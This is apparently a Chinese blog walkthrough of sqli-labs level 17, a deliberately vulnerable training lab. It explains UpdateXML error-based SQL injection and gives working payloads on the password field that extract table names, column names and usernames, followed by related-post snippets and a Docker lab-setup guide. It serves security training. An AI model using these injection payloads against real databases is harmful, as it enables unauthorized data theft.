sql靶场

已于 2024-09-19 15:03:37 修改
阅读量234 收藏 3
点赞数 4
文章标签: sql 数据库 java
于 2024-09-19 14:58:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74394274/article/details/142360571
版权

第十七关:

UpdateXML(xml_target, xpath_expr, new_xml)

其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。

发现密码存在注入点

1’ and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)

1’ and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=’database()’ and table_name=’users’)),3)#

uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(username) from(select username from users)a),1),3)#&submit=Submit

结束

小学生nai
关注
sql注入-sqli-labs第17关
weixin_46784800的博客
11-10 1678
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
sqlilabs第17关
wh1sper、的博客
04-29 1294
sqlilabs第17关一、分析二、手注 一、分析 这关题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs第十七关
m0_73248913的博客
02-11 348
sqli-labs第十七关教程
SQLI-labs-第十七关
最新发布
weixin_54055099的博客
05-16 1024
Sqli-labs第十七关,二次注入、报错注入
Sqlilabs-17
KAKA的博客
07-07 869
来到了 17 关,从这关开始刚学习需要借助源码来配合学习,本关学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sql注入#sql靶场
11-02
SQL靶场通常是指用于安全培训、测试和研究SQL注入攻击的环境,它可以帮助开发者和安全人员了解SQL注入的危害,学习如何防御这种攻击。 在SQL注入中,攻击者通过在网页表单、URL参数或其他用户输入点输入特定的SQL...
SQL靶场资源包,搭建靶场需要
05-16
标题中的“SQL靶场资源包”指的是用于学习和实践SQL注入漏洞的安全训练环境。SQL靶场通常由一系列具有不同安全漏洞的Web应用程序组成,这些漏洞允许用户通过输入恶意SQL语句来测试和利用系统。这样的资源包对于网络...
一个可以检测pakachu靶场漏洞和SQL靶场的程序
02-21
一个可以爬取网站信息,检测pakachu靶场漏洞和SQL靶场的程序,其中利用到了构造相关payload的方法,同时可以导出检测文件有相关问题链接的表格文件,作为报告,相当于一个漏洞检测软件,可以用来学习,主要还是定向...
sql靶场通关8-10
09-24
sql靶场8-10详解
sqli-sql注入著名靶场
03-28
在本文中,我们将深入探讨SQL注入攻击、如何防范以及“sqli-sql注入著名靶场”这个资源在学习和提升安全防护能力方面的作用。 首先,SQL注入攻击的原理是利用不安全的SQL查询语句,通过输入恶意数据来控制数据库...
sqli-labs靶场第十七关
gou1791241251的博客
12-27 905
十七关有点特别,让我重置密码,但是注入的原理还是一样的。 在输入用户名的地方,我尝试了单引号,双引号,不输入,等测试去判断闭合方式,最终没有得到想要的结果 后来在输入密码的地方尝试了同样的操作,最终结果都是一样。。 实在没有了头绪我选择了代码审计! 在代码中可以看到,先是处理账号,如果账号存在,则才能重置密码,也就是说,如果账号不存在,输入密码也是没用的 在这里我们可以看到,后台接收到uname参数时,调用了一个函数进行过滤了用户输入的内容。但是没有对密码进行过滤,所以密码框才是真正的注入点 如果输入内容
sqli-labs 17
m0_69548793的博客
08-27 1338
sqli-labs 17
sqli-labs靶场17关(基于post的更新查询报错注入)
qq_46527080的博客
12-18 789
知识点 updatexml()函数 updatexml()函数与extractvalue()类似,是更新xml文档的函数。 语法updatexml(目标xml文档,xml路径,更新的内容) updatexml(XML_document,XPath_string,new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:Xpath_String(Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条
sqli-labs-----第17关
wyzhxhn的博客
11-10 824
基于报错的更新查新。
sqli-labs 第十七关
qq_64302290的博客
05-13 979
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
Sqli-labs第十七关之UpdateXML
qq_39511050的博客
08-28 728
updatexml函数,xpath表达式
SQL-labs的第17关——报错注入(updatexml)
qq_73393033的博客
07-20 529
这一关的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs-master第17关
m_ing
05-14 2787
前言:这一关变化还是挺大的,让我们修改密码。 第17关 http://192.168.89.134/sqli-labs-master/Less-17/ 到这里我们还是毫无头绪,只能看源代码 从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg 在用户名正确后,页面便能够返回Mysql错误信息 所以我们决定用报错注入 使用updatexml(
sqli-labs第十七关详解
金 帛的博客
04-26 4262
sqlilabs第十七关详解
docker搭建sql靶场
07-27
要使用Docker搭建SQLi-LAB靶场,你可以按照以下步骤进行操作: 1. 首先,你需要安装Docker。你可以使用以下命令来安装所需的软件包: ``` yum install -y yum-utils device-mapper-persistent-data lvm2 yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo yum list docker-ce --showduplicates | sort -r yum install docker-ce ``` 2. 如果之前已经安装过Docker,你可能需要先卸载旧版本,然后再重新安装。你可以使用以下命令来卸载旧版本: ``` yum remove docker docker-common docker-selinux docker-engine ``` 3. 安装完成后,你可以使用以下命令来验证Docker是否成功安装: ``` docker version ``` 4. 接下来,你需要拉取SQLi-LAB的Docker镜像。你可以使用以下命令来搜索并拉取镜像: ``` docker search sqli-labs docker pull acgpiano/sqli-labs ``` 5. 拉取完成后,你可以使用以下命令来运行SQLi-LAB镜像: ``` docker run -dt --name sqli -p 8888:80 --rm acgpiano/sqli-labs ``` 通过以上步骤,你就可以使用Docker成功搭建SQLi-LAB靶场了。你可以通过访问`http://localhost:8888`来访问SQLi-LAB靶场。 #### 引用[.reference_title] - *1* *2* [[SQL靶场搭建]使用Docker搭建SQLi-LAB靶场](https://blog.csdn.net/m0_61155226/article/details/129833018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [docker部署常见的SQL注入靶场](https://blog.csdn.net/qq_52109950/article/details/129169073)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值